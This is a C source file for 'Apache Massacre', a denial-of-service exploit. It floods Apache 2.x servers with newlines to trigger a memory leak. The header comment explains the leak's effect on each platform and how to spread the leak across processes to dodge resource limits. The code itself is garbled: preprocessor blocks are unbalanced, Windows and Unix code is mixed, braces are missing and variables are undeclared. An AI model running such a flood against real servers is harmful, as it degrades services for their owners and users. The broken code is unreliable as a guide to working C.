/* apache-massacre.c
 * Test code for Apache 2.x Memory Leak
 * By Matthew Murphy
 * DISCLAIMER: This exploit tool is provided only to test networks for a
 * known vulnerability.  Do not use this tool on systems you do not control,
 * and do not use this tool on networks you do not own without appropriate
 * consent from the network owner.  You are responsible for any damage your
 * use of the tool causes.  In no event may the author of this tool be held
 * responsible for damages relating to its use.
 * Apache 2.x (2.0.44 and prior) has a memory leak in its request handling
 * that causes it to handle newlines in an akward manner -- it allocates
 * 80 bytes for each.  This quickly turns into a nightmare for server stats.
 * On Windows XP, I was able to cause Apache to consume 390 MB in a matter
 * of a few minutes.
 * The idea is to fire off millions of newlines, depriving Apache of valuable
 * memory, causing a huge performance degredation.  The worst part about this
 * flaw is that leaked memory isn't recovered until the Apache child process
 * terminates.
 * The high consumption drops some when the session ends, but there is still
 * a substantial increase in memory use that doesn't end until Apache exits.
 * I got memory use up to a peak of about 69,000 KB, and it dropped down to
 * about 37,000 KB.  The attacking code was the only traffic on the server --
 * the idle memory use of the server is about 7,132 KB.  Although the leak is
 * cut in half when the connection terminates, the leak is still a mighty
 * 29,878 KB (21.3 MB).  All this occurred in a matter of 15 seconds on my
 * 2.51 GHz P4.
 * As with most Apache exposures, the impacts vary between ports of the server:
 * Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected
 * by this, as Apache's child process doesn't terminate normally unless the
 * parent process stops.  This means that leaks (and any performance loss) hang
 * around until Apache is restarted.
 * Unix/mpm_prefork: This MPM offers the most protection against successful
 * exploitation, as its processes exit at the end of the request.
 * Unix/other MPMs: These other MPMs utilize multiple Apache processes for 
 * multiple Apache requests.  Depending on the MPM in use and the traffic rates
 * of the server, this may be used to the advantage of a potential attacker.
 * If multiple different Apache processes are utilized, an attacker can spread
 * the substantial leak between processes to dodge resource limits imposed on
 * httpd's UID (usually nobody, www, or apache)
 * Credit: iDEFENSE reported this issue to several security lists on April 8,
 * 2003 following the Apache release announcement.  Apache fixed the flaw about
 * a month after the initial disclosure of this vulnerability.  iDEFENSE credits
 * the discovery of this vulnerability to an anonymous researcher.
 * Happy Hunting!

#ifndef _WIN32
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <windows.h>
#pragma comment(lib, "wsock32.lib")
#include <stdlib.h>
#include <stdio.h>

int sig_fired = 0;

#ifndef _WIN32
void sig_handler(int sig) {
BOOL WINAPI sig_handler(DWORD dwCtrlType) {
	sig_fired = 1;
#ifndef _WIN32
	return TRUE;

int main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	char buffer[1025];
	struct hostent *he;
	unsigned short iPort = 80;
	int newlines = 100;
	char *p;
	char *p2;
	int i;
#ifdef _WIN32
	WSADATA wsa_prov;
	printf("Apache Massacre v1.0\r\n");
	printf("Exploit by Matthew Murphy\r\n");
	printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");
#ifdef _WIN32
	if (WSAStartup(0x0101, &wsa_prov)) {
	printf("Please enter the web server's host/IP: ");
	fgets(&buffer[0], 1024, stdin);
	he = gethostbyname(&buffer[0]);
	if (!he) {
	sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
	printf("Please enter the web server's port: ");
	fgets(&buffer[0], 1024, stdin);
	iPort = (unsigned short)atoi(&buffer[0]);
#ifndef _WIN32
#ifdef _SOLARIS
	sigset(SIGINT, &sig_handler);
	signal(SIGINT, &sig_handler);
	SetConsoleCtrlHandler(&sig_handler, TRUE);
	printf("How many newlines should be in each request [100]: ");
	fgets(&buffer[0], 1024, stdin);
	if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) {
		newlines = atoi(&buffer[0]);
	p = malloc(newlines*2);
	p2 = p;
	for (i = 0; i < newlines; i++) {
		*p2 = 0x0D;
		*p2 = 0x0A;
	newlines += newlines;
	if (s < 0) {
	sin.sin_family = AF_INET;
	sin.sin_port = htons(iPort);
	if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) {
	while (1) {
		if (!send(s, (char *)p, newlines, 0) == newlines) {
		if (sig_fired) {
			printf("Terminating on SIGINT");
#ifndef _WIN32